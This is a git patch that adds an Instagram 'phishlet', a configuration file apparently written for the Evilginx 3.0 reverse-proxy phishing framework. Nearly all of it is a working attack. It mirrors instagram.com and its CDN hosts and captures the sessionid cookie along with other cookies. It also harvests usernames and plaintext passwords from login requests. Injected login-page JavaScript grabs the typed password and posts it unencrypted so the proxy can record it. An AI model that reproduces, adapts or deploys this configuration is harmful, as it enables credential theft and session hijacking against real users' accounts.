From 59dc8f7ff4a24a76066d2c77ff2807accc2f0cb0 Mon Sep 17 00:00:00 2001
From: Tijme Gommers <t.gommers@outlook.com>
Date: Fri, 5 Apr 2024 11:24:55 +0200
Subject: [PATCH] Added 3.0 compatible Instagram phishlet.

---
 Instagram.yaml | 93 ++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 93 insertions(+)
 create mode 100644 Instagram.yaml

diff --git a/Instagram.yaml b/Instagram.yaml
new file mode 100644
index 0000000..644998d
--- /dev/null
+++ b/Instagram.yaml
@@ -0,0 +1,93 @@
+kname: 'Instagram'
+author: '@charlesbel'
+min_ver: '3.0.0'
+
+proxy_hosts:
+  - {phish_sub: 'www', orig_sub: 'www', domain: 'instagram.com', session: true, is_landing: true}
+  - {phish_sub: 'graphql', orig_sub: 'graphql', domain: 'instagram.com', session: false, is_landing: false}
+  - {phish_sub: 'i', orig_sub: 'i', domain: 'instagram.com', session: false, is_landing: false}
+  - {phish_sub: 'img', orig_sub: 'instagram.fcdg1-1.fna', domain: 'fbcdn.net', session: false, is_landing: false}
+  - {phish_sub: 'static-cdn', orig_sub: 'static', domain: 'cdninstagram.com', session: false, is_landing: false}
+  - {phish_sub: 'scontent-cdn', orig_sub: 'scontent', domain: 'cdninstagram.com', session: false, is_landing: false}
+
+sub_filters:
+  - {triggers_on: 'www.instagram.com', orig_sub: 'www', domain: 'instagram.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
+  - {triggers_on: 'www.instagram.com', orig_sub: 'graphql', domain: 'instagram.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
+  - {triggers_on: 'www.instagram.com', orig_sub: 'i', domain: 'instagram.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
+  - {triggers_on: 'www.instagram.com', orig_sub: 'static', domain: 'cdninstagram.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
+  - {triggers_on: 'www.instagram.com', orig_sub: '', domain: 'fbcdn.net', search: '(instagram\.f[a-z]{3}[0-9]+-[0-9]+\.fna\.{domain_regexp}\/v\/)', replace: 'img.{domain}/v/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
+  - {triggers_on: 'www.instagram.com', orig_sub: '', domain: 'fbcdn.net', search: '(instagram\.f[a-z]{3}[0-9]+-[0-9]+\.fna\.{domain_regexp}\\\/v\\\/)', replace: 'img.{domain}\\/v\\/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
+
+auth_tokens:
+  - domain: '.instagram.com'
+    keys: ['sessionid','.*,regexp']
+
+credentials:
+  username:
+    key: 'username'
+    search: '(.*)'
+    type: 'post'
+  password:
+    key: 'unenc_password'
+    search: '(.*)'
+    type: 'post'
+
+login:
+  domain: 'www.instagram.com'
+  path: '/accounts/login'
+
+js_inject:
+  - trigger_domains: ["www.instagram.com"]
+    trigger_paths: ["/accounts/login/", "/", "/accounts/login"]
+    trigger_params: []
+    script: |
+      const waitForEl = (selector) => {
+        return new Promise((resolve) => {
+          if (document.querySelector(selector)) {
+            return resolve(document.querySelector(selector));
+          }
+          const observer = new MutationObserver((mutations) => {
+            if (document.querySelector(selector)) {
+              resolve(document.querySelector(selector));
+              observer.disconnect();
+            }
+          });
+          observer.observe(document.body, {
+            childList: true,
+            subtree: true,
+          });
+        });
+      };
+      waitForEl("form[id=loginForm]").then(() => {
+        let subButton = document.querySelector("button[type=submit]");
+        let parent = subButton.parentElement;
+        async function a(ev) {
+          ev.stopPropagation();
+          ev.preventDefault();
+          if (!subButton.disabled) {
+            var password = document.getElementsByName("password")[0].value;
+            await fetch("/accounts/login/ajax/", {
+              method: "POST",
+              headers: { "Content-Type": "application/x-www-form-urlencoded" },
+              body: "unenc_password=" + encodeURIComponent(password),
+            });
+            parent.removeEventListener("click", a, true);
+            ev.target.click();
+          }
+        }
+        parent.addEventListener("click", a, true);
+        new MutationObserver(function (mutations) {
+          mutations.forEach(function (mutation) {
+            if (
+              mutation.type == "attributes" &&
+              mutation.attributeName == "disabled" &&
+              mutation.target.disabled == true
+            ) {
+              parent.removeEventListener("click", a, true);
+              parent.addEventListener("click", a, true);
+            }
+          });
+        }).observe(document.querySelector("button[type=submit]"), {
+          attributes: true,
+        });
+      });